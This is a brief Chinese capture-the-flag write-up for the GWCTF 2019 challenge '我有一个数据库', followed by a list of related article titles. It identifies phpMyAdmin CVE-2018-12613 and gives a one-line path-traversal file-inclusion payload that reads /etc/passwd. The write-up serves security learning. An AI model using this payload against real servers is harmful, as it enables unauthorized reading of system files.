啥都没有,前后端抓包也找不到啥,估计是目录扫描,但是号称第一的dirmap-master也没扫出啥
后来看博客,大佬们说看题目名字就猜到考啥,访问phpmyadmin路径(记下
phpMyAdmin是一个非常受欢迎的基于web的MySQL数据库管理工具
存在漏洞cve-2018-12613-PhpMyadmin后台文件包含
payload:target=db_datadict.php%253f/../../../../../../../../etc/passwd
看flag
相关文章
- 10-12[GWCTF 2019]我有一个数据库 - phpmyadmin4.8.1
- 10-12[GWCTF 2019]我有一个数据库
- 10-12web | [GWCTF 2019]我有一个数据库
- 10-12[GWCTF 2019]我有一个数据库
- 10-12BUUCTF[GWCTF 2019]我有一个数据库 1
- 10-12BUUCTF-[GWCTF 2019]我有一个数据库 1
- 10-12[GWCTF 2019]我有一个数据库
- 10-12[GWCTF 2019]我有一个数据库
- 10-12BUUFTC-日刷-[GWCTF 2019]我有一个数据库-phpmyadmin
- 10-12[GWCTF 2019]我有一个数据库